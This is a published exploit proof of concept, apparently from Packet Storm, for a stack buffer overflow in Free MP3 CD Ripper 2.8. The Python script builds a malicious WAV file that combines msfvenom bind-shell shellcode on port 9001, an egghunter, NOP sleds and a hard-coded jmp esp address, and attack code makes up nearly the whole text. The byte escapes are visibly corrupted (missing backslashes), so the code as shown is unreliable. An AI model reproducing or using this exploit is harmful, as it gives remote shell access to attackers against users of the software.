
Free MP3 CD Ripper 2.8 Buffer Overflow ≈ Packet Storm



# Exploit Title: Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)
# Date: 2020-07-22
# Exploit Author: Eduard Palisek
# Vendor Homepage: https://www.cleanersoft.com
# Software Link: https://www.cleanersoft.com/download/FMCRSetup.exe
# Version: 2.8 Build 20140611
# Tested on: Windows XP, Professional, Version 2002, SP 3
#!/usr/bin/python
# Proof-of-concept generator for the advisory above: it writes one crafted
# "exploit.wav" whose layout is the `buffer` expression at the bottom.
# Reproduced as published. NOTE(review): throughout this listing the byte
# escapes appear to have lost their backslash prefix during page extraction
# (e.g. "x90"), so the string literals shown are not the bytes the author
# intended; they are kept verbatim here.
file = open("exploit.wav", "wb")

# msfvenom -p windows/shell_bind_tcp LPORT=9001 -a x86 EXITFUNC=thread -e x86/shikata_ga_nai -b "x00x0ax0d" -f python -v shellcode_bind

# Encoded bind-shell payload emitted by the msfvenom command recorded above.
# This is a bytes literal, unlike the str pieces (nops, junk, tag, eip) below.
shellcode_bind = b""
shellcode_bind += b"xb8x88xbfxa2x65xdbxd6xd9x74x24"
shellcode_bind += b"xf4x5ax2bxc9xb1x53x83xc2x04x31"
shellcode_bind += b"x42x0ex03xcaxb1x40x90x36x25x06"
shellcode_bind += b"x5bxc6xb6x67xd5x23x87xa7x81x20"
shellcode_bind += b"xb8x17xc1x64x35xd3x87x9cxcex91"
shellcode_bind += b"x0fx93x67x1fx76x9ax78x0cx4axbd"
shellcode_bind += b"xfax4fx9fx1dxc2x9fxd2x5cx03xfd"
shellcode_bind += b"x1fx0cxdcx89xb2xa0x69xc7x0ex4b"
shellcode_bind += b"x21xc9x16xa8xf2xe8x37x7fx88xb2"
shellcode_bind += b"x97x7ex5dxcfx91x98x82xeax68x13"
shellcode_bind += b"x70x80x6axf5x48x69xc0x38x65x98"
shellcode_bind += b"x18x7dx42x43x6fx77xb0xfex68x4c"
shellcode_bind += b"xcax24xfcx56x6cxaexa6xb2x8cx63"
shellcode_bind += b"x30x31x82xc8x36x1dx87xcfx9bx16"
shellcode_bind += b"xb3x44x1axf8x35x1ex39xdcx1exc4"
shellcode_bind += b"x20x45xfbxabx5dx95xa4x14xf8xde"
shellcode_bind += b"x49x40x71xbdx05xa5xb8x3dxd6xa1"
shellcode_bind += b"xcbx4exe4x6ex60xd8x44xe6xaex1f"
shellcode_bind += b"xaaxddx17x8fx55xdex67x86x91x8a"
shellcode_bind += b"x37xb0x30xb3xd3x40xbcx66x49x48"
shellcode_bind += b"x1bxd9x6cxb5xdbx89x30x15xb4xc3"
shellcode_bind += b"xbex4axa4xebx14xe3x4dx16x97x28"
shellcode_bind += b"xa7x9fx71x44xa7xc9x2axf0x05x2e"
shellcode_bind += b"xe3x67x75x04x5bx0fx3ex4ex5cx30"
shellcode_bind += b"xbfx44xcaxa6x34x8bxcexd7x4ax86"
shellcode_bind += b"x66x80xddx5cxe7xe3x7cx60x22x93"
shellcode_bind += b"x1dxf3xa9x63x6bxe8x65x34x3cxde"
shellcode_bind += b"x7fxd0xd0x79xd6xc6x28x1fx11x42"
shellcode_bind += b"xf7xdcx9cx4bx7ax58xbbx5bx42x61"
shellcode_bind += b"x87x0fx1ax34x51xf9xdcxeex13x53"
shellcode_bind += b"xb7x5dxfax33x4exaex3dx45x4fxfb"
shellcode_bind += b"xcbxa9xfex52x8axd6xcfx32x1axaf"
shellcode_bind += b"x2dxa3xe5x7axf6xc3x07xaex03x6c"
shellcode_bind += b"x9ex3bxaexf1x21x96xedx0fxa2x12"
shellcode_bind += b"x8exebxbax57x8bxb0x7cx84xe1xa9"
shellcode_bind += b"xe8xaax56xc9x38"

# Egghunter stub, as published. It embeds the marker bytes x57x30x30x54
# ("W00T"), which correspond to the `tag` placed in front of the payload below.
egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x57x30x30x54x8bxfaxafx75xeaxafx75xe7xffxe7"





# 30-byte NOP sled; used twice in the layout (before the payload, before the egghunter).
nops = "x90" * 30
# 2112 bytes of filler; with the fixed 2000-byte region below it places `eip` at offset 4112.
junk1 = "A" * 2112
# Marker the egghunter searches for (its bytes contain one "W00T").
tag = "W00TW00T"
# Pads tag + nops + payload out to exactly 2000 bytes.
# NOTE(review): shellcode_bind is bytes while nops/tag are str; the mixed
# concatenation is kept as published.
junk2 = "B" * (2000-len(shellcode_bind+nops+tag))
# Hard-coded address from the XP SP3 test system named in the header; it is
# only meaningful where user32.dll loads at that fixed base (no ASLR/rebasing).
eip = "x53x93x42x7e" # 0x7e429353 : jmp esp in user32.dll

# Final file layout, front to back:
#   junk1 | tag | nops | shellcode_bind | junk2 | eip | nops | egghunter
buffer = junk1 + tag + nops + shellcode_bind + junk2 + eip + nops + egghunter

file.write(buffer)
file.close()
